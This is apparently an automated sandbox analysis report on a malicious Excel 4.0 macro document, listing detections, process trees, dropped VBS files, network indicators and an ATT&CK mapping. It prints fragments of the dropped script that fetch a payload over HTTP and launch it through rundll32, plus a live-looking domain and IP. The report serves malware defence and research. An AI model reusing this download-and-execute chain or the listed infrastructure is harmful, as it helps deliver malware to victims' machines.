
Analysis Report notif_7310.xls

Overview

General Information

Sample Name: notif_7310.xls
Analysis ID: 289315
MD5: d8442d7a237852c47a1856950683fd08
SHA1: aa68573f3c9e97cc1df12b971de95905238c0547
SHA256: 897174f7ae2c41ab945c74bf7b94dddc0e0ccdd3b7ee552bfe7fb812ca73ed1e

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Launcher Generic
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Injects code into the Windows Explorer (explorer.exe)
Microsoft Office drops suspicious files
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Unable to load, office file is protected or invalid

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1696 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • explorer.exe (PID: 896 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2832 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • explorer.exe (PID: 2844 cmdline: explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbs MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
  • explorer.exe (PID: 2392 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2752 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 2816 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 2948 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • explorer.exe (PID: 3036 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • wscript.exe (PID: 3016 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs' MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\AK1.vbs
Rule: JoeSecurity_VBSLauncherGeneric
Description: Yara detected VBS Launcher Generic
Author: Joe Security

Memory Dumps

Source: Process Memory Space: wscript.exe PID: 3016
Rule: JoeSecurity_VBSLauncherGeneric
Description: Yara detected VBS Launcher Generic
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Office product drops script at suspicious location
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1696, TargetFilename: C:\Users\user\AppData\Local\Temp\OdThK9.vbs

Signature Overview


AV Detection:

Multi AV Scanner detection for submitted file
Source: notif_7310.xls; Virustotal: Detection: 11%

Spreading:

Yara detected VBS Launcher Generic
Source: Yara match; File source: Process Memory Space: wscript.exe PID: 3016, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\AK1.vbs, type: DROPPED

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\OdThK9.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\d6E6S0.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\AK1.vbs
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe
Source: global traffic; DNS query: name: beautifulday.site
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 104.27.136.242:443

Networking:

Potential malicious VBS script found (has network functionality)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: Gxyl.Open: Gxyl.Type = 1: Gxyl.Write DY1dSemt.ResponseBody
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: Gxyl.SaveToFile "C:\Users\user\AppData\Local\Temp\yWf6uFo.html",2: Gxyl.Close: Exit For: End If: Next
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: unknown; DNS traffic detected: queries for: beautifulday.site
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown; Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Found Excel 4.0 Macro with suspicious formulas
Source: notif_7310.xls; Initial sample: WORKSPACE
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\OdThK9.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\d6E6S0.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\AK1.vbs
Potential malicious VBS script found (suspicious strings)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: Y0Teu = Array(N8h,Z02HZK0,Uk2ZOW,uUrnaAp): Dim DY1dSemt: Set DY1dSemt = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped file: HFpOu.Document.Application.ShellExecute "rundll32.exe","C:\Users\user\AppData\Local\Temp\yWf6uFo.html,DllRegisterServer","C:\Windows\System32",Null,0
Source: notif_7310.xls; OLE indicator, VBA macros: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Window title found: microsoft excel okthe workbook cannot be opened or repaired by microsoft excel because it is corrupt.
Source: classification engine; Classification label: mal100.spre.expl.evad.winXLS@16/10@2/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\05DE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRCB79.tmp
Source: notif_7310.xls; OLE indicator, Workbook stream: true
Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs
Source: unknown; Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Windows\explorer.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe; File read: C:\Windows\System32\drivers\etc\hosts
Source: notif_7310.xls; Virustotal: Detection: 11%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs
Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs'
Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbs
Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs'
Source: unknown; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbs
Source: unknown; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\OdThK9.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\d6E6S0.vbs
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Local\Temp\AK1.vbs
Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\OdThK9.vbs'
Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\d6E6S0.vbs'
Source: C:\Windows\explorer.exe; Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\AK1.vbs'
Source: C:\Windows\explorer.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\wscript.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe; File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
Source: C:\Windows\explorer.exe TID: 2412; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2352; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2836; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2916; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 2476; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 3044; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2972; Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 2268; Thread sleep time: -180000s >= -30000s
Source: explorer.exe, 00000006.00000003.2097618855.00000000002BA000.00000004.00000001.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.27.136.242 187
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 896 base: 50000 value: 01
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 896 base: 50020 value: 9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 896 base: 7FFFFFD5368 value: 00
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2832 base: 50000 value: 01
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2832 base: 50020 value: 9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2832 base: 7FFFFFD7368 value: 00
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2844 base: 50000 value: 01
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2844 base: 50020 value: 9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Memory written: PID: 2844 base: 7FFFFFD8368 value: 00
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Scripting ³²¹ | Path Interception | Process Injection ²¹ | Masquerading ¹ | OS Credential Dumping | Query Registry ¹ | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel ² | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Exploitation for Client Execution ²³ | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion ² | LSASS Memory | Security Software Discovery ¹¹ | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol ¹ | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection ²¹ | Security Account Manager | Virtualization/Sandbox Evasion ² | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol ² | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting ³²¹ | NTDS | Remote System Discovery ¹ | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery ¹ | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery ³ | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |

Behavior Graph

(Interactive behavior graph not reproduced in this text. Legend keys: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)